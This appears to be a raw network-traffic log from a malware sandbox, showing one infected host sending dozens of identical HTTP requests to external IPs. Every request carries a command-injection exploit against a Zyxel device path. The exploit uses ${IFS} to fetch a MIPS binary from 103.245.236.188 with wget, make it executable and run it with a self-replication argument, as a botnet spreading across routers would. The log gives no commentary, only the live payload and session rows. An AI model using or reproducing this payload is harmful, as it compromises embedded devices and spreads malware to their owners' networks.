                                    Jan 13, 2024 19:02:20.859838963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1141192.168.2.135281239.175.42.233443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.859868050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1142192.168.2.134413050.107.205.117443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.859924078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1143192.168.2.1343990103.190.7.32443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.859958887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1144192.168.2.133461266.242.221.91443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.859968901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1145192.168.2.1333004212.143.211.226443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.859985113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1146192.168.2.1337118105.231.84.175443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.860024929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1147192.168.2.1355316142.143.191.146443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.860079050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1148192.168.2.1350498104.81.119.59443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.860117912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1149192.168.2.1358236208.3.108.6443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.860176086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1150192.168.2.1346606122.147.49.154443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.860181093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1151192.168.2.1352758131.230.111.238443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.860188961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1152192.168.2.1357486136.93.123.104443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.860188961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1153192.168.2.1353806144.164.145.197443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.860234022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1154192.168.2.1358964178.57.35.1443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.860279083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1155192.168.2.1350366132.66.205.91443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.860315084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1156192.168.2.1357764129.167.171.225443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.860337019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1157192.168.2.1353658209.229.182.50443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.860400915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1158192.168.2.1337878208.162.22.48443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.860438108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1159192.168.2.1352176137.245.16.148443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.860460043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1160192.168.2.1337286171.92.212.17443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.860467911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1161192.168.2.134938827.174.82.224443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.860517025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1162192.168.2.135641234.176.8.104443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.860532999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1163192.168.2.1342980142.141.228.52443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.860553980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1164192.168.2.1338588172.222.143.189443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.860600948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1165192.168.2.133420874.96.135.207443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.860637903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1166192.168.2.1354768190.207.200.111443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.860676050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1167192.168.2.1360782198.11.23.56443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.860713005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1168192.168.2.135953872.175.97.253443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.860745907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1169192.168.2.1346024120.34.113.5443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.860774040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1170192.168.2.1332858132.138.233.232443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.860821962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1171192.168.2.134687837.123.137.208443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.860836983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1172192.168.2.1344106201.88.17.87443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.860865116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1173192.168.2.133406686.167.10.218443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.860918999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1174192.168.2.1336448156.176.9.151443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.860949039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1175192.168.2.135196214.60.34.146443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.860969067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1176192.168.2.13415281.227.174.2443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.860991001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1177192.168.2.1354500102.198.31.98443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.861038923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1178192.168.2.1341332152.22.50.99443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.861073971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1179192.168.2.133635223.44.193.249443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.861102104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1180192.168.2.1344156175.128.120.42443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.861161947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1181192.168.2.1354308136.169.159.159443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.861161947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1182192.168.2.1356932119.135.215.67443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.861207008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1183192.168.2.134592498.161.155.99443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.861224890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1184192.168.2.134439053.187.152.121443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.861291885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1185192.168.2.1334170207.196.135.23443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.861311913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1186192.168.2.133955697.199.192.61443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.861350060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1187192.168.2.134567423.240.173.209443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.861372948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1188192.168.2.134813665.32.104.3443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.861402988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1189192.168.2.134923820.99.175.66443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.861437082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1190192.168.2.134473665.194.217.185443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.861469030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1191192.168.2.13438429.95.96.96443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.861516953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1192192.168.2.1344448153.226.127.62443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.861551046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1193192.168.2.135352661.180.244.10443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.861579895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1194192.168.2.1351140126.224.82.133443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.861618996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1195192.168.2.1360540196.200.158.140443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.861670971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1196192.168.2.1360230193.99.196.140443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.861691952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1197192.168.2.1342174108.63.19.199443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.861752033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1198192.168.2.135028072.188.170.207443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.861788988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1199192.168.2.134318298.149.24.78443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.861815929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1200192.168.2.1355474192.132.145.65443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.861836910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1201192.168.2.1336196141.149.63.73443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.861875057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1202192.168.2.1337716175.110.196.99443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.861905098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1203192.168.2.134074659.9.122.196443
                                    TimestampBytes transferredDirectionData
